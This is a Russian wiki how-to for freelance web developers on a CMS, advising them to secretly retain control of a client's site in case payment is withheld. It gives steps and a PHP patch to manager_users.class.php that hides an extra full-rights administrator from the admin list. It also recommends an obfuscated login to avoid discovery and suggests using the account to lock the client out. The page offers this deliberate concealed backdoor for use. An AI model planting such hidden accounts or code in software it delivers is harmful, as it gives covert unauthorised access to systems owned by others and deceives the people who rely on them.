Инструменты пользователя

Инструменты сайта


hack:system_admin

Наверняка, при создании сайта на заказ, многие сталкивались с такой ситуацией:

Взяв задаток, вы сделали проект, показали заказчику, все нормально…..далее - Зём, мамой клянусь да, отдай проект, мы ща его покажем дяде Васе, тот нам сразу бабла, мы тебе оставшуюся часть, будь человеком, войди в положение…. Вы, как человек с широкой душой, отдаете проект, потом начинается…..Дядя Вася уехал, вебмани не работают, завтра-послезавтра, на той неделе и т.д. А проект вы уже отдали, пароли они естественно все поменяли….сделать Вы ничего не можете…. Остается вытереть сопли и ждать…..ЧЕСТНО заработанные деньги….. НО, мы то же не пальцем деланные, предлагаю вашему вниманию фичу, которая поможет вам получить остаток своих денег. Способ не претендует на уникальность и спасение от всех бед, но от дурака поможет точно….. Итак, при создании сайта, мы указываем логин и пароль дефолтного админа. У пока мы делаем проект, он у нас как правило один и висит, его доступ мы и отдаем заказчику, он меняет пароль и мы бессильны. Если перед тем, как отдать проект, вы сомневаетесь в порядочности заказчика, можно сделать следующее:

  1. Создаем еще одного админа. (Администраторы → Управление администраторами → Добавить пользователя)
  2. Даем ему все права, главный и все такое.
  3. Далее надо либо в БД поправить кое чего, но можно просто, выйти из админки и зайти под логином и паролем только что созданного админа.
  4. Открываем файл сайт.ру/admin/manager_users.class.php

ищем в нем функцию function bof_show_form_admin() (У меня это строчка 1070, но наверняка могут быть отличия, файл у меня доработанный)

Код:

function bof_show_form_admin()
    {
    	global $kernel;

    	$user_tmp = $this->get_array_users();
    	$template = $kernel->pub_template_parse("admin/templates/default/access_list_admin.html");
    	$html = $template['main'];

меняем на:

Код:

function bof_show_form_admin()
    {
    	global $kernel;

    	$user_tmp = $this->get_array_users();
              foreach ($user_tmp as $key => $value)
                   {
                   if (array_search ('my_admin', $value))
                        {
				unset($user_tmp[$key]);
			}
		   }
    	$template = $kernel->pub_template_parse("admin/templates/default/access_list_admin.html");
        $html = $template['main'];

Обращаем внимание на эту строчку:

if (array_search ('my_admin', $value))

здесь my_admin - это логин того «секретного» админа, которого мы создали. Естественно, здесь мы не пишем ivanov_vasya!!! создаем логин типа 030ef3000d808274fe601714a784c2bd. так сложнее будет спалить код. Вообще были мысли жестко привязать нашего админа к такому логину: имя домена_santafox, но не знаю, надо ли это….

Что мы делаем теперь? теперь мы ищем в многомерном массиве КЛЮЧ именно нашего админа и удаляем этот элемент массива. И не важно, каким по счету идет наш админ, первым или 48-м. Теперь, что бы там не вытворял заказчик, удалял главного и т.д., наш админ всегда будет скрыт! Так вот, если денег не платят, заходим в админку под нашим «секретным админом», ну а там уже у кого на что фантазии хватит Самое действенное, я думаю, поменять пароль от админа заказчика, тогда он сам к вам прибежит….

Всем удачи!

Автор: http://arteshuk.tk

hack/system_admin.txt · Последние изменения: 2012/10/11 15:49 — 84.52.98.201